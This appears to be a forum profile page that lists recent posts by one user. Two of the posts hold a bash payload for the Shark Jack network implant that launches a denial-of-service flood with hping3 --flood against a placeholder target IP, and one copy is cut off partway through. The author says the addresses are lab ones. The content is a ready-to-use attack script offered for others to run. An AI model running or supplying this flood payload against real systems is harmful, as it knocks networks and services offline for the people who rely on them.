Jump to content

Sourison

Members
  • Content Count

    3
  • Joined

  • Last visited

About Sourison

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. btw the ip addresses are my "lab ip's.. so it's not a secret 😉"
  2. Thank you Darren for your reply, I really appreciate your help 🙂 Below I've added the new code. #!/bin/bash # # Title: denial of service on the Shark Jack # Author: Sourison # Version: 1.1.0 # # Magenta...........Setup # Yellow..........Running # ##Hping options, Change TARGET_IP to the target ip address HPING_OPTIONS="--flood -c 4096 TARGET_IP" function setup() { LED SETUP # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done } function run() { # Run setup set
  3. #!/bin/bash # # Title: denial of service on the Shark Jack # Author: Sourison # Version: 1.1.0 # # Red ...........Setup # Magenta..........Running # ##Hping options, Change TARGET_IP to the target ip address HPING_OPTIONS="--flood -c 4096 TARGET_IP" function setup() { LED R # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done } function run() { # Run setup setup LED M # Start scan hping3 $HPING_OPTIONS finish } # Run payload run &
×
×
  • Create New...